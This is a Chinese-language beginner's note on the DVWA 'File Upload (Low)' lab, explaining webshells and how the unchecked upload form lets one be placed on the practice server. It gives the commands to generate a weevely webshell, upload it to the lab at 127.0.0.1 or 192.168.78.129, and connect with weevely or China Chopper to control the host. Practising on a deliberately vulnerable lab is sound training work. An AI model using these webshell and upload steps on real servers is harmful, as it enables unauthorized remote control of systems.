2.File Upload(Low)——小白笔记——DVWA

0x01:Webshell

1.Webshell是什么?

Webshell:包含用来连接靶机服务器操作系统的恶意代码的文件

2.File Upload(Low)——小白笔记——DVWA_第1张图片
2.怎么生产Webshell

通过中国菜刀(weevely)生产Webshell

0x02:Low级别的DVWA测试

1.上源码:
File Upload Source:

Your image was not uploaded.
'; } else { // Yes! echo "
{$target_path} succesfully uploaded!
"; } } 发现没有做任何对文件类型的判断 ?>

2.攻击演示——KALI做靶机服务器和KALI做攻击机:

①.可以制作一个攻击的代码:

0.环境:对于在kali上装的DVWA靶机
1.利用菜刀在apache2目录下上传一个文件:weevely  generate  password  /var/www/html/upload.php
2.ls  /var/www/html	(生产一个连接操作系统的php恶意代码)
3.cat  /var/www/html		(查看的内容是

②.使用火狐登录http://127.0.0.1/dvwa,进入file upload栏目,上传刚刚生成的upload.php文件
2.File Upload(Low)——小白笔记——DVWA_第2张图片
③.在Kali的终端terminal使用菜刀连接:
weevely http://127.0.0.1/dvwa/hackable/upload.php password
2.File Upload(Low)——小白笔记——DVWA_第3张图片

3.攻击演示——不使用Kali:

1.用vm打开一个dvwa的linux靶机:

2.File Upload(Low)——小白笔记——DVWA_第4张图片

2.写一个用于上传PHP恶意代码,用于生成webshell
1.建立一个文本:
2.输入一下内容

//密码是pass
3.后缀名可以写.php

在这里插入图片描述

3.登录靶机的dvwa平台:http://192.168.78.129/dvwa,点击文件上传栏目上传该wenshell脚本文件			//发现有一个路径:../../hackable/uploads/up.php

2.File Upload(Low)——小白笔记——DVWA_第5张图片

4.使用中国菜刀连接该webshell:http://192.168.78.129/dvwa/hackable/uploads/Low.php	//注意右击空白,新建连接,输入该网址,输入密码pass,选择php类型

2.File Upload(Low)——小白笔记——DVWA_第6张图片

5.切换到靶机,查看是否真的上传了up.php文件			//如图

2.File Upload(Low)——小白笔记——DVWA_第7张图片

0x03:综上所述攻击步骤是:

1.生成webshell攻击代码
2.上传webshell码到Web服务器上
3.使用菜刀连接该webshell

你可能感兴趣的:(DVWA乱序)